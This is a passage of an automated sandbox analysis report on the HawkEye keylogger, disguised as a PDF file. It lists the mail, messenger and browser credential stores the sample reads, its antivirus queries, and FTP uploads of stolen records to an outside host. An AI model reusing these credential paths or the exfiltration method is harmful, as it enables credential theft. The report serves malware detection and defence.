                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Users\user\Desktop\300821.PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00407674 GetVersionExW,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                      Source: C:\Users\user\Desktop\300821.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\300821.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected MailPassViewShow sources
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.45fa72.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.3b69930.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.3b69930.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5604, type: MEMORYSTR
                      Yara detected HawkEye KeyloggerShow sources
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Tries to steal Mail credentials (via file registry)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword
                      Yara detected WebBrowserPassView password recovery toolShow sources
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.3b81b50.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.3b81b50.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.3b69930.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Tries to steal Instant Messenger accounts or passwordsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                      Remote Access Functionality:

                      barindex
                      Yara detected HawkEye KeyloggerShow sources
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d31130.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4d2ad28.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.4ba1ea8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c29bd.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.300821.PDF.exe.2b8b210.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.40c0fb8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.300821.PDF.exe.400e278.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 2848, type: MEMORYSTR
                      Detected HawkEye RatShow sources
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmpString found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmpString found in binary or memory: lXftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576%208.30.2021%207:03:04%20AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915713906.0000000002DA8000.00000004.00000001.sdmpString found in binary or memory: l^ftp://ftp.vn-gpack.org/HawkEye_Keylogger_Stealer_Records_238576%208.30.2021%207:03:04%20AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmpString found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txtP
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmpString found in binary or memory: lHSTOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                      Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Replication Through Removable Media1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection111Deobfuscate/Decode Files or Information11Input Capture1Peripheral Device Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information141Credentials in Registry2Account Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13Credentials In Files1File and Directory Discovery1Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSystem Information Discovery18SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion41Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncSecurity Software Discovery121Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemVirtualization/Sandbox Evasion41Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingApplication Window Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Owner/User Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      300821.PDF.exe22%ReversingLabsByteCode-MSIL.Infostealer.Heye

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
                      0.2.300821.PDF.exe.4d2ad28.6.unpack100%AviraTR/Inject.vcoldiDownload File
                      5.2.300821.PDF.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                      5.2.300821.PDF.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      ftp.vn-gpack.org1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%URL Reputationsafe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
                      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e0%Avira URL Cloudsafe
                      https://pki.goog/repository/00%URL Reputationsafe
                      https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      https://172.217.23.78/0%Avira URL Cloudsafe
                      https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z0%Avira URL Cloudsafe
                      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                      http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM0%Avira URL Cloudsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js0%URL Reputationsafe
                      http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%URL Reputationsafe
                      https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e0%Avira URL Cloudsafe
                      https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.vn-gpack.org
                      		66.70.204.222
                      		truetrueunknown
                      240.163.3.0.in-addr.arpa
                      		unknown
                      		unknownfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.com/chrome/static/css/main.v2.min.cssbhvE2B1.tmp.8.drfalse
                          		high
                          https://www.msn.com//searchp/LinkId=255141vbc.exe, 00000008.00000003.691593547.00000000021F5000.00000004.00000001.sdmpfalse
                            		high
                            https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQvbc.exe, 00000008.00000003.690799803.000000000220A000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drfalse
                              		high
